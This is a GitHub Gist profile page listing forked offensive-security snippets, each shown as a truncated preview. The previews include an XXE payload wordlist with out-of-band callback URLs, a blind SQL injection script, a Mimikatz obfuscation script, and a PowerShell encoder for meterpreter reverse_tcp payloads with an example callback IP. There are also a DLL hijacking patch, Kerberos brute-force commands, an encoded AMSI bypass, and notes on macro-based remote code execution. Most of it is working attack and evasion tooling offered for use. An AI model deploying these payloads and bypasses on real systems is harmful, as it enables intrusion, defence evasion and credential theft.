Skip to content

Instantly share code, notes, and snippets.

View NyaMeeEain's full-sized avatar
🎯
Focusing

NyaMeeEain NyaMeeEain

🎯
Focusing
26 followers · 146 following
View GitHub Profile
@NyaMeeEain
NyaMeeEain / filter_nessus_risks.py
Created December 19, 2020 04:50 — forked from 3lpsy/filter_nessus_risks.py
Filter out lower risk vulns in .nessus file
import sys
import argparse
from pathlib import Path
import lxml.etree as et
def run_filter(file, risks):
if len(sys.argv) < 1:
print("usage: [script].py nessusfile.nessus")
sys.exit(1)
@NyaMeeEain
NyaMeeEain / xxe-payloads.txt
Created December 19, 2020 04:46 — forked from 3lpsy/xxe-payloads.txt
XXE bruteforce wordlist
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y
@NyaMeeEain
NyaMeeEain / blind.py
Created December 19, 2020 04:44 — forked from 3lpsy/blind.py
Scuffed Blind SQL Injection for Burp's Web Sec Academy
import requests
from pathlib import Path
from urllib.parse import quote
import argparse
from string import ascii_lowercase
import os
from urllib3.exceptions import InsecureRequestWarning
# This actually a pretty bad implementation. I wrote it in about an hour.
@NyaMeeEain
NyaMeeEain / obfuscate-mimikatz.sh
Created August 6, 2020 09:28 — forked from gazcbm/obfuscate-mimikatz.sh
#!/bin/bash
if [[ $# -le 1 ]] ; then
echo './obfuscate-mimikatz.sh Invoke-Mimikatz.ps1 newfile.ps1'
exit 1
fi
randstr(){< /dev/urandom tr -dc a-zA-Z0-9 | head -c${1:-8};}
cp $1 $2
@NyaMeeEain
NyaMeeEain / ps1encode.py
Created August 5, 2020 02:57 — forked from FrankSpierings/ps1encode.py
Encoder like TrustedSec Unicorn, to allow x64 payloads - I don't like to migrate.
#!/usr/bin/env python2
#
# Example: python2 ps1encoder.py 10.0.0.1 4444 -p windows/x64/meterpreter/reverse_tcp -b > engage.bat
# Example: python2 ps1encoder.py 10.0.0.1 4444 -p windows/x64/meterpreter/reverse_tcp > engage.ps1
import random
import string
import argparse
import base64
import codecs
@NyaMeeEain
NyaMeeEain / main.cpp
Created May 30, 2020 02:23 — forked from monoxgas/main.cpp
Adaptive DLL Hijacking - Patching LoadLibrary Return
#include <Windows.h>
#include <intrin.h>
#include <string>
#include <TlHelp32.h>
#include <psapi.h>
BOOL PatchTheRet(HMODULE realModule) {
// Get primary module info
@NyaMeeEain
NyaMeeEain / kerberos_attacks_cheatsheet.md
Created March 18, 2020 01:17 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@NyaMeeEain
NyaMeeEain / amsi-bypass.ps1
Created August 7, 2019 00:36 — forked from davehardy20/amsi-bypass.ps1
$a = @(85,87,112,80,64,64,76,64,64,64,64,68,64,64,64,64,46,46,57,64,64,77,102,64,64,64,64,64,64,64,64,64,80,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,102,64,64,64,64,64,53,103,116,102,53,64,117,64,111,79,72,99,102,67,85,76,49,105,87,70,105,113,98,120,67,118,98,108,56,111,98,108,71,117,72,70,79,105,99,108,52,119,101,66,67,104,91,82,67,120,101,86,53,102,96,86,53,102,83,68,56,85,72,70,48,119,91,70,84,116,69,80,49,74,75,64,64,64,64,64,64,64,64,64,67,80,83,80,64,64,85,64,68,69,64,77,117,66,77,109,118,64,64,64,64,64,64,64,64,64,64,78,64,64,72,104,64,77,64,85,64,64,64,64,53,64,64,64,64,70,64,64,64,64,64,64,64,64,66,104,118,64,64,64,64,102,64,64,64,64,80,64,64,64,64,64,64,64,68,64,64,102,64,64,64,64,64,102,64,64,67,64,64,64,64,64,64,64,64,64,64,70,64,64,64,64,64,64,64,64,64,64,66,64,64,64,64,64,64,102,64,64,64,64,64,64,64,64,76,64,88,72,84,64,64,67,64,64,64,67,64,64,64,64,64,64,68,64,64,64,68,64,64,64,64,64,64,64,64,67,
@NyaMeeEain
NyaMeeEain / Various-Macro-Based-RCEs.md
Created January 29, 2019 09:35 — forked from mgeeky/Various-Macro-Based-RCEs.md
Various Visual Basic Macros-based Remote Code Execution techniques to get your meterpreter invoked on the infected machine.

This is a note for myself describing various Visual Basic macros construction strategies that could be used for remote code execution via malicious Document vector. Nothing new or fancy here, just a list of techniques, tools and scripts collected in one place for a quick glimpse of an eye before setting a payload.

All of the below examples had been generated for using as a remote address: 192.168.56.101.

List:

  1. Page substiution macro for luring user to click Enable Content
  2. The Unicorn Powershell based payload